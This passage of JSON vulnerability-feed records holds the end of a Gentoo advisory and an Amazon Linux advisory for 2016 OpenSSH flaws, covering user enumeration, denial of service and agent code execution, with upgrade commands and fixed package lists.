Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nRemote attackers could cause Denial of Service and conduct user enumeration. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSSH users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/openssh-7.3_p1-r7\"", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "href": "https://security.gentoo.org/glsa/201612-18", "id": "GLSA-201612-18", "type": "gentoo", "title": "OpenSSH: Multiple vulnerabilities", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "**Issue Overview:**\n\nA covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. ([CVE-2016-6210 __](<https://access.redhat.com/security/cve/CVE-2016-6210>))\n\nIt was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. ([CVE-2016-6515 __](<https://access.redhat.com/security/cve/CVE-2016-6515>))\n\nIt was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. 
([CVE-2016-10009 __](<https://access.redhat.com/security/cve/CVE-2016-10009>))\n\nIt was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. ([CVE-2016-10011 __](<https://access.redhat.com/security/cve/CVE-2016-10011>))\n\nIt was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. ([CVE-2016-10012 __](<https://access.redhat.com/security/cve/CVE-2016-10012>))\n\n \n**Affected Packages:** \n\n\nopenssh\n\n \n**Issue Correction:** \nRun _yum update openssh_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n openssh-ldap-7.4p1-11.68.amzn1.i686 \n pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.i686 \n openssh-cavs-7.4p1-11.68.amzn1.i686 \n openssh-7.4p1-11.68.amzn1.i686 \n openssh-debuginfo-7.4p1-11.68.amzn1.i686 \n openssh-keycat-7.4p1-11.68.amzn1.i686 \n openssh-server-7.4p1-11.68.amzn1.i686 \n openssh-clients-7.4p1-11.68.amzn1.i686 \n \n src: \n openssh-7.4p1-11.68.amzn1.src \n \n x86_64: \n openssh-ldap-7.4p1-11.68.amzn1.x86_64 \n openssh-server-7.4p1-11.68.amzn1.x86_64 \n openssh-7.4p1-11.68.amzn1.x86_64 \n openssh-keycat-7.4p1-11.68.amzn1.x86_64 \n pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.x86_64 \n openssh-cavs-7.4p1-11.68.amzn1.x86_64 \n openssh-debuginfo-7.4p1-11.68.amzn1.x86_64 \n openssh-clients-7.4p1-11.68.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2017-10-03T11:00:00", "published": "2017-10-03T11:00:00", "id": "ALAS-2017-898", "href": "https://alas.aws.amazon.com/ALAS-2017-898.html", "title": "Medium: openssh", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}